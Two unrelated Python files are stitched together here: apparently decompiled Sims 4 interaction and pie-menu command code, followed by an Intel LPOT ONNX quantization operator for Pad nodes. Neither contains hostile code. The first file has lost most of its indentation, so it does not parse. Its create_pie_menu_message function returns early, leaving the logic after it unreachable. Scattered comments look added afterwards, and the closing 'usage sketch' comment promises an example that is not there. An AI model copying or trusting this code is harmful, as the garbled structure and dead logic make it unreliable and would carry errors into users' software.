context.add_preferred_objects(preferred_objects)
potential_interactions = list(sim_info.sim_skewer_affordance_gen(context, picked_item_ids={client.active_sim_info.sim_id}))
choice_menu.add_potential_aops(pick_target, context, potential_interactions, scoring_gsi_handler)
client.set_choices(choice_menu)
        elif pick_type == PickType.PICK_MANAGE_OUTFITS:
context = client.create_interaction_context(sim)
retail_manager = services.business_service().get_retail_manager_for_zone()
potential_interactions = []
if retail_manager is not None:
potential_interactions = list(retail_manager.potential_manage_outfit_interactions_gen(context))
choice_menu.add_potential_aops(pick_target, context, potential_interactions, scoring_gsi_handler)
client.set_choices(choice_menu)
else:
if show_pie_menu:
shift_held = False
else:
position = sims4.math.Vector3(x, y, z)
pick_target, pick_type, potential_targets = _get_targets_from_pick(sim, pick_target, pick_type, position, level, (zone.id), lot_id,
is_routable, preferred_objects=preferred_objects)
if pick_target is None:
return
interaction_parameters = client.get_interaction_parameters()
if potential_targets:
alt_bool = bool(alt)
control_bool = bool(control)
def _add_potential_object_aops(potential_target, routing_surface):
pick = PickInfo(pick_type=pick_type, target=potential_target, location=position, routing_surface=routing_surface,
lot_id=lot_id,
level=level,
alt=alt_bool,
control=control_bool,
shift=shift_held)
context = client.create_interaction_context(sim, pick=pick, shift_held=shift_held)
context.add_preferred_objects(preferred_objects)
potential_aops = list((potential_target.potential_interactions)(context, **interaction_parameters))
choice_menu.add_potential_aops(potential_target, context, potential_aops, scoring_gsi_handler)
return pick
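            # _add_potential_object_aops (above) wraps a (target, routing_surface) pair
            # in a PickInfo and pours that target's affordances into the shared
            # choice_menu; the loop below drives it over every potential pick target.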
for potential_target, routing_surface in potential_targets:
if potential_target.is_sim:
suppress_social_front_page |= potential_target.should_suppress_social_front_page_when_targeted()
pick = _add_potential_object_aops(potential_target, routing_surface)
if not shift_held:
if sim is not None:
context = client.create_interaction_context(sim, pick=pick, shift_held=shift_held)
context.add_preferred_objects(preferred_objects)
sim.fill_choices_menu_with_si_state_aops(pick_target, context, choice_menu, scoring_gsi_handler)
if len(choice_menu) == 0:
fire_service = services.get_fire_service()
if fire_service.fire_is_active:
fires = fire_service.get_fires_in_potential_targets(potential_targets)
if fires:
potential_target = fires[0]
_add_potential_object_aops(potential_target, potential_target.routing_surface)
client.set_choices(choice_menu)
if gsi_handlers.sim_handlers_log.pie_menu_generation_archiver.enabled:
gsi_handlers.sim_handlers_log.archive_pie_menu_option(sim, potential_target, scoring_gsi_handler)
msg = create_pie_menu_message(sim, choice_menu, reference_id, pie_menu_action, target=pick_target, suppress_front_page=suppress_social_front_page)
distributor = Distributor.instance()
distributor.add_event(Consts_pb2.MSG_PIE_MENU_CREATE, msg, True)
num_choices = len(msg.items)
if num_choices > 0:
if pick_type in (PickType.PICK_PORTRAIT, PickType.PICK_SIM, PickType.PICK_CLUB_PANEL):
with telemetry_helper.begin_hook(writer, TELEMETRY_HOOK_CREATE_PIE_MENU, sim=sim) as (hook):
hook.write_int('piid', reference_id)
hook.write_enum('kind', pick_type)
hook.write_int('tsim', target_id)
else:
with telemetry_helper.begin_hook(writer, TELEMETRY_HOOK_CREATE_PIE_MENU, sim=sim) as (hook):
hook.write_int('piid', reference_id)
                if pick_target is not None and getattr(pick_target, 'definition', None):
hook.write_guid('tobj', pick_target.definition.id)
else:
hook.write_int('tobj', 0)
hook.write_enum('kind', pick_type)
return num_choices
@sims4.commands.Command('interactions.phone_choices', command_type=(sims4.commands.CommandType.Live))
def generate_phone_choices(control: int=0, alt: int=0, shift: int=0, reference_id: int=0, _connection=None):
client = services.client_manager().get(_connection)
sim = _active_sim(client)
if sim is None:
return 0
scoring_gsi_handler = {} if gsi_handlers.sim_handlers_log.pie_menu_generation_archiver.enabled else None
msg = None
phone_disabled_tooltip = None
resolver = SingleSimResolver(sim.sim_info)
for phone_test in PhoneTuning.DISABLE_PHONE_TESTS:
test_result = resolver(phone_test.test)
if test_result:
phone_disabled_tooltip = phone_test.tooltip
msg = create_pie_menu_message(sim, None, reference_id, None, failure_tooltip=(phone_disabled_tooltip(sim)))
break
if msg is None:
shift_held = bool(shift)
context = client.create_interaction_context(sim, shift_held=shift_held)
can_queue_interactions = sim.queue is None or sim.queue.can_queue_visible_interaction()
if can_queue_interactions:
pie_menu_action = PieMenuActions.SHOW_PIE_MENU
choice_menu = ChoiceMenu(sim)
choice_menu.add_potential_aops(None, context, sim.potential_phone_interactions(context), scoring_gsi_handler)
client.set_choices(choice_menu)
if gsi_handlers.sim_handlers_log.pie_menu_generation_archiver.enabled:
gsi_handlers.sim_handlers_log.archive_pie_menu_option(sim, sim, scoring_gsi_handler)
else:
pie_menu_action = PieMenuActions.INTERACTION_QUEUE_FULL_TOOLTIP
choice_menu = None
msg = create_pie_menu_message(sim, choice_menu, reference_id, pie_menu_action)
distributor = Distributor.instance()
distributor.add_event(Consts_pb2.MSG_PHONE_MENU_CREATE, msg, True)
with telemetry_helper.begin_hook(writer, TELEMETRY_HOOK_CREATE_PIE_MENU, sim=sim) as (hook):
hook.write_int('piid', reference_id)
hook.write_string('kind', 'phone')
return len(msg.items)
def create_pie_menu_message(sim, choice_menu, reference_id, pie_menu_action, target=None, failure_tooltip=None, suppress_front_page=False):
msg = interaction_protocol.PieMenuCreate()
msg.sim = sim.id if sim is not None else 0
msg.client_reference_id = reference_id
msg.server_reference_id = 0
msg.supress_social_front_page = suppress_front_page
if failure_tooltip is not None:
msg.disabled_tooltip = failure_tooltip
return msg
    if not choice_menu or not any(choice_menu.menu_items):
        fire_service = services.get_fire_service()
        if fire_service.fire_is_active:
            msg.disabled_tooltip = fire_service.INTERACTION_UNAVAILABLE_DUE_TO_FIRE_TOOLTIP()
            return msg
        if pie_menu_action != PieMenuActions.SHOW_DEBUG_PIE_MENU:
            situation_manager = services.get_zone_situation_manager()
            for situation in situation_manager.get_all():
                if situation.disabled_interaction_tooltip is not None and situation.is_sim_in_situation(sim):
                    msg.disabled_tooltip = situation.disabled_interaction_tooltip()
                    return msg
            if pie_menu_action == PieMenuActions.INTERACTION_QUEUE_FULL_TOOLTIP:
                msg.disabled_tooltip = PieMenuActions.INTERACTION_QUEUE_FULL_STR(sim)
                return msg
create_tokens(msg.category_tokens, sim, target, None if target is None else target.get_stored_sim_info())
if choice_menu:
resolver = InteractionResolver(None, None, target, next(iter(choice_menu))[1].context)
else:
resolver = SingleActorAndObjectResolver(sim, target, source='create_pie_menu_message')
if sim is not None:
icon_override, parent_override, blacklist_icon_tags, blacklist_parent_tags = sim.get_actor_new_pie_menu_icon_and_parent_name(None, resolver)
else:
icon_override = None
parent_override = None
blacklist_icon_tags = set()
blacklist_parent_tags = set()
if choice_menu is not None:
msg.server_reference_id = choice_menu.revision
club_service = services.get_club_service()
tutorial_service = services.get_tutorial_service()
for option_id, item in choice_menu:
aop = item.aop
aop_affordance = aop.affordance
if tutorial_service is not None:
if not tutorial_service.is_affordance_visible(aop_affordance):
continue
if sim is None:
modifier_tooltip = None
else:
modifier_visibility, modifier_tooltip = sim.test_pie_menu_modifiers(aop_affordance)
if not modifier_visibility:
continue
with ProtocolBufferRollback(msg.items) as (item_msg):
item_msg.id = aop.aop_id
context = item.context
allow_global_icon_overrides = not blacklist_icon_tags & aop_affordance.interaction_category_tags
allow_global_parent_overrides = not blacklist_parent_tags & aop_affordance.interaction_category_tags
logger.debug('%3d: %s' % (option_id, aop))
name = (aop_affordance.get_name)((aop.target), context, **aop.interaction_parameters)
name_override_tunable, name_override_result = aop_affordance.get_name_override_tunable_and_result(target=(aop.target), context=context)
if parent_override is not None:
if allow_global_parent_overrides:
name = parent_override(sim, name)
pie_menu_icon = (aop_affordance.get_pie_menu_icon_info)(context=context, **aop.interaction_parameters) if icon_override is None else None
category_key = item.category_key
ignore_pie_menu_icon_override = aop_affordance.is_rally_interaction and pie_menu_icon is not None
if name_override_tunable is not None:
if name_override_tunable.new_pie_menu_icon is not None:
if not ignore_pie_menu_icon_override:
pie_menu_icon = name_override_tunable.new_pie_menu_icon(resolver)
if name_override_tunable.new_pie_menu_category is not None:
category_key = name_override_tunable.new_pie_menu_category.guid64
if name_override_tunable.parent_name is not None:
                        if parent_override is None or not allow_global_parent_overrides:
                            name = name_override_tunable.parent_name(sim, name)
if _show_interaction_tuning_name:
affordance_tuning_name = str(aop_affordance.__name__)
name = InteractionCommandsTuning.INTERACTION_TUNING_NAME(name, affordance_tuning_name)
item_msg.score = aop.content_score if aop.content_score is not None else 0
if _show_front_page_score:
name = InteractionCommandsTuning.INTERACTION_FRONT_PAGE_SCORING(name, str(item_msg.score))
item_msg.loc_string = name
tooltip = modifier_tooltip or item.result.tooltip
if tooltip is not None:
tooltip = (aop_affordance.create_localized_string)(tooltip, context=context, target=aop.target, **aop.interaction_parameters)
item_msg.disabled_text = tooltip
elif tutorial_service is not None:
tooltip = tutorial_service.get_disabled_affordance_tooltip(aop_affordance)
if tooltip is not None:
tooltip = (aop_affordance.create_localized_string)(tooltip, context=context, target=aop.target, **aop.interaction_parameters)
item_msg.disabled_text = tooltip
else:
success_tooltip = (aop_affordance.get_display_tooltip)(override=name_override_tunable, context=context, target=aop.target, **aop.interaction_parameters)
if success_tooltip is not None:
item_msg.success_tooltip = success_tooltip
if icon_override is not None and allow_global_icon_overrides:
item_msg.icon_infos.append(create_icon_info_msg(IconInfoData(icon_resource=icon_override)))
else:
if pie_menu_icon is not None:
item_msg.icon_infos.append(create_icon_info_msg(pie_menu_icon))
elif category_key is not None:
item_msg.category_key = category_key
else:
if item.result.icon is not None:
item_msg.icon_infos.append(create_icon_info_msg(IconInfoData(icon_resource=(item.result.icon))))
if aop.show_posture_incompatible_icon:
item_msg.icon_infos.append(create_icon_info_msg(IconInfoData(icon_resource=(PieMenuActions.POSTURE_INCOMPATIBLE_ICON))))
if club_service is not None and sim is not None:
encouragement, _ = club_service.get_interaction_encouragement_status_and_rules_for_sim_info(sim.sim_info, aop)
if encouragement == ClubRuleEncouragementStatus.ENCOURAGED:
item_msg.icon_infos.append(create_icon_info_msg(IconInfoData(icon_resource=(club_tuning.ClubTunables.PIE_MENU_INTERACTION_ENCOURAGED_ICON))))
else:
if encouragement == ClubRuleEncouragementStatus.DISCOURAGED:
item_msg.icon_infos.append(create_icon_info_msg(IconInfoData(icon_resource=(club_tuning.ClubTunables.PIE_MENU_INTERACTION_DISCOURAGED_ICON))))
handle_pie_menu_item_coloring(item_msg, item, sim, aop, name_override_result)
for visual_target in (aop_affordance.visual_targets_gen)((aop.target), context, **aop.interaction_parameters):
if visual_target is not None:
item_msg.target_ids.append(visual_target.id)
item_msg.pie_menu_priority = aop_affordance.pie_menu_priority
return msg
def handle_pie_menu_item_coloring(item_msg, item, sim, choice, name_override_result):
mood_result = None
mood_intensity_result = None
away_action = choice.interaction_parameters.get('away_action')
away_action_sim_info = choice.interaction_parameters.get('away_action_sim_info')
if away_action is not None:
away_action_sim_current_mood = away_action_sim_info.get_mood()
if away_action_sim_current_mood in away_action.mood_list:
mood_result = away_action_sim_current_mood
mood_intensity_result = away_action_sim_info.get_mood_intensity()
elif item.result.influence_by_active_mood or name_override_result.influence_by_active_mood:
mood_result = sim.get_mood()
mood_intensity_result = sim.get_mood_intensity()
else:
mood_result, mood_intensity_result = item.aop.affordance.get_pie_menu_color(context=(item.context))
if mood_result is not None:
item_msg.mood = mood_result.guid64
item_msg.mood_intensity = mood_intensity_result
@sims4.commands.Command('interactions.select', command_type=(sims4.commands.CommandType.Live))
def select_choice(choice_id: int, reference_id: int=0, _connection=None):
client = services.client_manager().get(_connection)
return client.select_interaction(choice_id, reference_id)
@sims4.commands.Command('interactions.queue')
def display_queue(sim_id: int=None, _connection=None):
output = Output(_connection)
if sim_id is None:
client = services.client_manager().get(_connection)
sim = _active_sim(client)
else:
sim_info = services.sim_info_manager().get(sim_id)
sim = sim_info.get_sim_instance(allow_hidden_flags=ALL_HIDDEN_REASONS) if sim_info is not None else None
if sim is None:
output('Invalid Sim id {0:08x}'.format(sim_id))
return False
output('Super Interaction State: (num = {0})'.format(len(sim.si_state)))
for si in sim.si_state.sis_actor_gen():
output(' * {}'.format(str(si)))
for subi in si.queued_sub_interactions_gen():
output(' - {}'.format(str(subi)))
output('Interaction Queue State: (num = {0})'.format(len(sim.queue)))
for si in sim.queue:
output(' * {}'.format(str(si)))
output('Running: %s' % sim.queue.running)
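# Console usage sketch: "interactions.queue" dumps the active Sim's SI state and
# interaction queue; "interactions.queue <sim_id>" targets a specific instanced
# Sim instead.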
@sims4.commands.Command('qa.interactions.list', command_type=(sims4.commands.CommandType.Automation))
def display_queue_automation(sim_id: int=None, _connection=None):
output = sims4.commands.AutomationOutput(_connection)
if sim_id is None:
client = services.client_manager().get(_connection)
sim = _active_sim(client)
else:
sim_info = services.sim_info_manager().get(sim_id)
sim = sim_info.get_sim_instance(allow_hidden_flags=ALL_HIDDEN_REASONS) if sim_info is not None else None
if sim is None:
output('SimInteractionData; SimId:None')
return False
elif sim.queue.running is None:
output('SimInteractionData; SimId:%d, SICount:%d, RunningId:None' % (
sim.id, len(sim.si_state)))
else:
output('SimInteractionData; SimId:%d, SICount:%d, RunningId:%d, RunningClass:%s' % (
sim.id, len(sim.si_state), sim.queue.running.id, sim.queue.running.__class__.__name__))
for si in sim.si_state.sis_actor_gen():
output('SimSuperInteractionData; Id:%d, Class:%s' % (si.id, si.__class__.__name__))
@sims4.commands.Command('interactions.reevaluate_head')
def reevaluate_head(sim_id: int=None, _connection=None):
output = sims4.commands.AutomationOutput(_connection)
if sim_id is None:
client = services.client_manager().get(_connection)
sim = _active_sim(client)
else:
sim_info = services.sim_info_manager().get(sim_id)
sim = sim_info.get_sim_instance() if sim_info is not None else None
if sim is None:
output('SimInteractionData; SimId:None')
return False
for interaction in sim.queue:
if interaction.is_super:
interaction.transition = None
sim.queue._get_head()
@sims4.commands.Command('qa.interactions.enable_sim_interaction_logging', command_type=(sims4.commands.CommandType.Automation))
def enable_sim_interaction_logging(sim_id: int=None, _connection=None):
output = sims4.commands.AutomationOutput(_connection)
if sim_id is None:
client = services.client_manager().get(_connection)
sim = _active_sim(client)
else:
sim_info = services.sim_info_manager().get(sim_id)
sim = sim_info.get_sim_instance(allow_hidden_flags=ALL_HIDDEN_REASONS) if sim_info is not None else None
if sim is None:
output('SimInteractionToggleOn; SimId:None')
return False
sim.interaction_logging = True
output('[AreaInstanceInteraction] SimInteractionToggleOn; SimId:%d, Logging:%d' % (sim.id, sim.interaction_logging))
@sims4.commands.Command('qa.interactions.disable_sim_interaction_logging', command_type=(sims4.commands.CommandType.Automation))
def disable_sim_interaction_logging(sim_id: int=None, _connection=None):
output = sims4.commands.AutomationOutput(_connection)
if sim_id is None:
client = services.client_manager().get(_connection)
sim = _active_sim(client)
else:
sim_info = services.sim_info_manager().get(sim_id)
sim = sim_info.get_sim_instance(allow_hidden_flags=ALL_HIDDEN_REASONS) if sim_info is not None else None
if sim is None:
output('SimInteractionToggleOff; SimId:None')
return False
sim.interaction_logging = False
output('[AreaInstanceInteraction] SimInteractionToggleOff; SimId:%d, Logging:%d' % (sim.id, sim.interaction_logging))
@sims4.commands.Command('qa.interactions.enable_sim_transition_path_logging', command_type=(sims4.commands.CommandType.Automation))
def enable_sim_transition_path_logging(sim_id: int=None, _connection=None):
output = sims4.commands.AutomationOutput(_connection)
if sim_id is None:
client = services.client_manager().get(_connection)
sim = _active_sim(client)
else:
sim_info = services.sim_info_manager().get(sim_id)
sim = sim_info.get_sim_instance(allow_hidden_flags=ALL_HIDDEN_REASONS) if sim_info is not None else None
if sim is None:
output('SimTransitionPathToggleOn; SimId:None')
return False
sim.transition_path_logging = True
    output('[AreaInstanceInteraction] SimTransitionPathToggleOn; SimId:%d, Logging:%d' % (sim.id, sim.transition_path_logging))
@sims4.commands.Command('qa.interactions.disable_sim_transition_path_logging', command_type=(sims4.commands.CommandType.Automation))
def disable_sim_transition_path_logging(sim_id: int=None, _connection=None):
output = sims4.commands.AutomationOutput(_connection)
if sim_id is None:
client = services.client_manager().get(_connection)
sim = _active_sim(client)
else:
sim_info = services.sim_info_manager().get(sim_id)
sim = sim_info.get_sim_instance(allow_hidden_flags=ALL_HIDDEN_REASONS) if sim_info is not None else None
if sim is None:
output('SimTransitionPathToggleOff; SimId:None')
return False
sim.transition_path_logging = False
    output('[AreaInstanceInteraction] SimTransitionPathToggleOff; SimId:%d, Logging:%d' % (sim.id, sim.transition_path_logging))
@sims4.commands.Command('interactions.display_outcomes')
def display_outcomes(sim_id: int=None, _connection=None):
sim_info = services.sim_info_manager().get(sim_id)
sim = sim_info.get_sim_instance() if sim_info is not None else None
client = services.client_manager().get(_connection)
if sim is None:
sim = _active_sim(client)
for si in sim.si_state.sis_actor_gen():
sims4.commands.output('Outcome for {} = {}'.format(si.affordance, si.global_outcome_result), _connection)
def send_reject_response(client, sim, context_handle, cancel_reason):
reject_msg = protocols.ServerResponseFailed()
reject_msg.handle = context_handle
reject_msg.reason = cancel_reason
distributor = Distributor.instance()
distributor.add_op_with_no_owner(GenericProtocolBufferOp(Operation.SIM_SERVER_RESPONSE_FAILED, reject_msg))
logger.debug(' sending reject msg')
def cancel_common(interaction_id: int, context_handle: int=None, _connection=None, user_canceled=False):
client = services.client_manager().get(_connection)
sim = _active_sim(client)
interaction = sim.find_interaction_by_id(interaction_id)
if interaction is None:
continuation = sim.find_continuation_by_id(interaction_id)
if continuation is not None:
continuation.cancel_user(cancel_reason_msg='User canceled the interaction.')
return True
if interaction.cancel_user(cancel_reason_msg='Command interactions.cancel_si'):
return True
if context_handle is not None:
send_reject_response(client, sim, context_handle, protocols.ServerResponseFailed.REJECT_CLIENT_CANCEL_SUPERINTERACTION)
return False
@sims4.commands.Command('interactions.force_inertial', command_type=(sims4.commands.CommandType.Automation))
def interaction_force_inertial(opt_target: OptionalTargetParam=None, _connection=None):
sim = get_optional_target(opt_target, _connection)
if sim is None:
return False
for si in sim.si_state:
si.force_inertial = True
@sims4.commands.Command('interactions.cancel', command_type=(sims4.commands.CommandType.Live))
def cancel_mixer_interaction(interaction_id: int, mixer_id: int, server_ref: int, context_handle: int=None, _connection=None):
logger.debug('cancel_sub_interaction {0}', interaction_id)
client = services.client_manager().get(_connection)
sim = _active_sim(client)
interaction = sim.find_sub_interaction_by_aop_id(interaction_id, mixer_id)
if interaction is not None:
if sim.queue.running != interaction:
return interaction.cancel_user(cancel_reason_msg='Command interactions.cancel')
return False
@sims4.commands.Command('interactions.cancel_si', command_type=(sims4.commands.CommandType.Live))
def cancel_super_interaction(super_interaction_id: int, context_handle: int=None, _connection=None):
logger.debug('cancel_super_interaction {0}', super_interaction_id)
if False:
if _mixer_lock:
return False
return cancel_common(super_interaction_id, context_handle, _connection, user_canceled=True)
@sims4.commands.Command('interactions.run_first')
def first_interaction(target_id: int=None, _connection=None):
target = None
if target_id is not None:
target = services.object_manager().get(target_id)
client = services.client_manager().get(_connection)
sim = _active_sim(client)
if target is None:
target = sim
context = client.create_interaction_context(sim)
affordances = list(target.potential_interactions(context))
if affordances:
logger.debug('Running affordance: {0}', affordances[0])
return affordances[0].test_and_execute(context)
return False
@sims4.commands.Command('interactions.push', command_type=(sims4.commands.CommandType.Live))
def push_interaction(affordance: TunableInstanceParam(sims4.resources.Types.INTERACTION), opt_target: RequiredTargetParam=None, opt_sim: OptionalTargetParam=None, priority=Priority.High, _connection=None):
target = opt_target.get_target() if opt_target is not None else None
sim = get_optional_target(opt_sim, _connection)
client = services.client_manager().get(_connection)
priority = Priority(priority)
if not sim.queue.can_queue_visible_interaction():
sims4.commands.output('Interaction queue is full, cannot add anymore interactions.', _connection)
return False
context = InteractionContext(sim, (InteractionContext.SOURCE_PIE_MENU), priority, client=client, pick=None)
result = sim.push_super_affordance(affordance, target, context)
if not result:
output = sims4.commands.Output(_connection)
output('Failed to push: {}'.format(result))
return False
return True
@sims4.commands.Command('interactions.push_all_sims')
def push_interaction_on_all_sims(affordance: TunableInstanceParam(sims4.resources.Types.INTERACTION), opt_target: RequiredTargetParam=None, _connection=None):
target = opt_target.get_target() if opt_target is not None else None
client = services.client_manager().get(_connection)
for sim_info in client.selectable_sims:
sim = sim_info.get_sim_instance()
if sim is not None:
context = InteractionContext(sim, (InteractionContext.SOURCE_PIE_MENU), (Priority.High), client=client, pick=None)
sim.push_super_affordance(affordance, target, context)
return True
@sims4.commands.Command('interactions.content_mode')
def set_content_mode(mode=None, _connection=None):
output = sims4.commands.Output(_connection)
if mode is None:
output('No mode specified. Please use one of: {}'.format(', '.join(ContentModes.names)))
return False
try:
valid_mode = ContentModes[mode.upper()]
except AttributeError:
output('Invalid mode specified. Please use one of: {}'.format(', '.join(ContentModes.names)))
return False
else:
services.config_service().content_mode = valid_mode
output('Mode set to {}'.format(valid_mode.name))
return True
@sims4.commands.Command('demo.mixer_lock')
def demo_mixer_lock(enabled=None, _connection=None):
output = sims4.commands.Output(_connection)
output('Mixer lock is not supported in optimized python builds.')
class InteractionModes(enum.Int, export=False):
default = 0
autonomous = 1
@sims4.commands.Command('interactions.set_interaction_mode')
def set_interaction_mode(mode: InteractionModes=None, source: int=None, priority: interactions.priority.Priority=None, _connection=None):
output = sims4.commands.Output(_connection)
client = services.client_manager().get(_connection)
if client is None:
return 0
sources = {}
for key, val in vars(interactions.context.InteractionContext).items():
if key.startswith('SOURCE'):
sources[val] = key
if mode is None:
if source is None:
if priority is None:
output('Source options:')
for val in sources.values():
output(' {}'.format(val))
output('Priority options:')
for val in interactions.priority.Priority:
output(' {}'.format(val.name))
elif mode is InteractionModes.default:
client.interaction_source = None
client.interaction_priority = None
else:
if mode is InteractionModes.autonomous:
client.interaction_source = interactions.context.InteractionContext.SOURCE_AUTONOMY
client.interaction_priority = interactions.priority.Priority.Low
if source is not None:
client.interaction_source = source
if priority is not None:
client.interaction_priority = priority
source = sources.get(client.interaction_source, client.interaction_source)
output('Client interaction mode: source={} priority={}'.format(source, client.interaction_priority.name))
return 1
@sims4.commands.Command('interactions.debug_outcome_print', command_type=(sims4.commands.CommandType.Automation))
def debug_outcome_index_print(affordance: TunableInstanceParam(sims4.resources.Types.INTERACTION), mode=None, _connection=None):
sims4.commands.output(affordance.outcome.print_outcome_index(), _connection)
@sims4.commands.Command('interactions.debug_outcome_index_set', command_type=(sims4.commands.CommandType.Automation))
def debug_outcome_index_set(affordance: TunableInstanceParam(sims4.resources.Types.INTERACTION), debug_outcome_index, mode=None, _connection=None):
interactions.utils.outcome.update_debug_outcome_index_mapping(affordance, debug_outcome_index)
sims4.commands.output(interactions.utils.outcome.debug_outcome_index_mapping.__str__(), _connection)
@sims4.commands.Command('interactions.debug_outcome_index_table_clear', command_type=(sims4.commands.CommandType.Automation))
def debug_outcome_index_table_clear(mode=None, _connection=None):
interactions.utils.outcome.debug_outcome_index_mapping = None
@sims4.commands.Command('interactions.debug_outcome_index_table_print', command_type=(sims4.commands.CommandType.Automation))
def debug_outcome_index_table_print(mode=None, _connection=None):
sims4.commands.output(interactions.utils.outcome.debug_outcome_index_mapping.__str__(), _connection)
@sims4.commands.Command('interactions.debug_outcome_style_set', command_type=(sims4.commands.CommandType.Automation))
def set_debug_outcome_style(debug_style, mode=None, _connection=None):
interactions.utils.outcome.debug_outcome_style = _parse_debug_outcome_style(debug_style)
@sims4.commands.Command('interactions.debug_outcome_style_current')
def print_current_debug_outcome_style(mode=None, _connection=None):
sims4.commands.output(interactions.utils.outcome.debug_outcome_style.__str__(), _connection)
@sims4.commands.Command('interactions.print_content_set')
def print_current_content_set(_connection=None):
client = services.client_manager().get(_connection)
if client is None:
return
sim = _active_sim(client)
if sim is None:
sims4.commands.output('There is no active sim.', _connection)
else:
has_printed = False
context = client.create_interaction_context(sim)
for si in sim.si_state:
potential_targets = si.get_potential_mixer_targets()
content_set = autonomy.content_sets.generate_content_set(sim, (si.super_affordance),
si,
context,
potential_targets=potential_targets)
for weight, aop, test_result in content_set:
affordance_name = aop.affordance.__name__ + ' '
sims4.commands.output('affordance:{} weight:{} result:{}'.format(affordance_name, weight, test_result), _connection)
has_printed = True
if not has_printed:
sims4.commands.output('Could not find an active content set.', _connection)
def _parse_debug_outcome_style(debug_outcome_style):
    input_lower = debug_outcome_style.lower()
    style = interactions.utils.outcome.DebugOutcomeStyle.NONE
    if input_lower in ('auto_succeed', 'success'):
        style = interactions.utils.outcome.DebugOutcomeStyle.AUTO_SUCCEED
    elif input_lower in ('auto_fail', 'fail'):
        style = interactions.utils.outcome.DebugOutcomeStyle.AUTO_FAIL
    elif input_lower in ('rotate', 'alternate'):
        style = interactions.utils.outcome.DebugOutcomeStyle.ROTATE
    elif input_lower in ('none', 'off'):
        style = interactions.utils.outcome.DebugOutcomeStyle.NONE
    return style
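# e.g. _parse_debug_outcome_style('fail') returns DebugOutcomeStyle.AUTO_FAIL;
# any unrecognised string falls through to DebugOutcomeStyle.NONE.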
@sims4.commands.Command('interactions.lock_content_set', command_type=(sims4.commands.CommandType.Automation))
def lock_content_set(*mixer_interactions, _connection=None):
    try:
        autonomy.content_sets.lock_content_sets(mixer_interactions)
    except Exception as e:
        sims4.commands.output('Content set lock failed: {}'.format(e), _connection)
@sims4.commands.Command('interactions.regenerate', command_type=(sims4.commands.CommandType.Automation))
def regenerate(_connection=None):
client = services.client_manager().get(_connection)
sim = _active_sim(client)
if sim is not None:
sims4.commands.output('Regenerate Content set currently disabled.', _connection)
@sims4.commands.Command('interactions.set_social_mixer_tests_enabled')
def toggle_social_tests(enabled: bool=None):
current = interactions.social.social_mixer_interaction.tunable_tests_enabled
if enabled is None:
interactions.social.social_mixer_interaction.tunable_tests_enabled = not current
else:
interactions.social.social_mixer_interaction.tunable_tests_enabled = enabled
@sims4.commands.Command('interactions.toggle_interactions_in_callstack', command_type=(sims4.commands.CommandType.Automation))
def toggle_interactions_in_callstack(enabled: bool=None, _connection=None):
value = postures.transition_sequence.inject_interaction_name_in_callstack
value = not value
postures.transition_sequence.inject_interaction_name_in_callstack = value
sims4.commands.output('Inject interaction names: {}'.format(value), _connection)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy
import onnx
from onnxruntime.quantization.quant_utils import QuantizedValueType, \
attribute_to_kwarg
from .base_operator import QuantOperatorBase
from lpot.adaptor.ox_utils.util import QuantizedValue
class QPad(QuantOperatorBase):
def __init__(self, onnx_quantizer, onnx_node):
super().__init__(onnx_quantizer, onnx_node)
def quantize(self):
node = self.node
assert (node.op_type == "Pad")
# Only after version 11, it has the optional constant_value
        # If input[0] is not quantized, do not quantize this node
if (self.quantizer.opset_version < 11) or (node.input[0] not \
in self.quantizer.quantized_value_map):
super().quantize()
return
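        # Past this guard input[0] is known to be quantized; the Pad node below is
        # rewired to consume the quantized input tensor and emit a quantized output.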
quantized_input_value = self.quantizer.quantized_value_map[node.input[0]]
kwargs = {}
for attribute in node.attribute:
kv = attribute_to_kwarg(attribute)
kwargs.update(kv)
if 'mode' not in kwargs or kwargs['mode'] == b'constant':
if len(node.input) > 2: # There is 3rd input 'constant_value'
zp_tensor = self.quantizer.model.get_initializer(quantized_input_value.zp_name)
scale_tensor = \
self.quantizer.model.get_initializer(quantized_input_value.scale_name)
# if zp_tensor is None or scale_tensor is None:
# super().quantize()
# return
padding_constant_initializer = self.quantizer.model.get_initializer(node.input[2])
if padding_constant_initializer is not None:
zp_array = onnx.numpy_helper.to_array(zp_tensor)
zp_value = zp_array.item() if zp_array.ndim == 0 else zp_array[0]
scale_array = onnx.numpy_helper.to_array(scale_tensor)
scale_value = scale_array.item() if scale_array.ndim == 0 else scale_array[0]
padding_constant_array = \
onnx.numpy_helper.to_array(padding_constant_initializer)
quantized_padding_constant_array = quantize_nparray(
self.activation_dtype,
padding_constant_array, scale_value, zp_value)
quantized_padding_constant_name = node.input[2] + "_quantized"
quantized_padding_constant_initializer = onnx.numpy_helper.from_array(
quantized_padding_constant_array, quantized_padding_constant_name)
# Suppose this padding constant initializer only used by the node
self.quantizer.model.remove_initializer(padding_constant_initializer)
self.quantizer.model.add_initializer(quantized_padding_constant_initializer)
node.input[2] = quantized_padding_constant_name
else:
pad_value_qnodes = self.quantizer._get_quantize_input_nodes(node, 2,
self.activation_dtype)
self.quantizer.new_nodes += pad_value_qnodes
node.input[2] = pad_value_qnodes[0].output[0]
else:
# pad zero_point for original zero
node.input.extend([quantized_input_value.zp_name])
# Create an entry for output quantized value
quantized_output_value = QuantizedValue(node.output[0], node.output[0] + "_quantized",
quantized_input_value.scale_name,
quantized_input_value.zp_name,
QuantizedValueType.Input)
self.quantizer.quantized_value_map[node.output[0]] = quantized_output_value
node.name = node.name + "_quant" if node.name != "" else ""
node.input[0] = quantized_input_value.q_name
node.output[0] = quantized_output_value.q_name
self.quantizer.new_nodes += [node]
def quantize_nparray(qtype, arr, scale, zero_point, low=None, high=None):
dtype = numpy.uint8 if qtype == "uint8" else numpy.int8
cliplow = max(0 if dtype == numpy.uint8 else -127, -127 if low is None else low)
cliphigh = min(255 if dtype == numpy.uint8 else 127, 255 if high is None else high)
arr_fp32 = numpy.asarray((arr.astype(numpy.float32) / scale).round() + zero_point)
numpy.clip(arr_fp32, cliplow, cliphigh, out=arr_fp32)
return arr_fp32.astype(dtype)
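# A minimal usage sketch (illustrative values only, not part of the original
# module): quantize_nparray applies the affine mapping
# q = clip(round(x / scale) + zero_point), so a float32 array lands in the
# uint8 range as shown.
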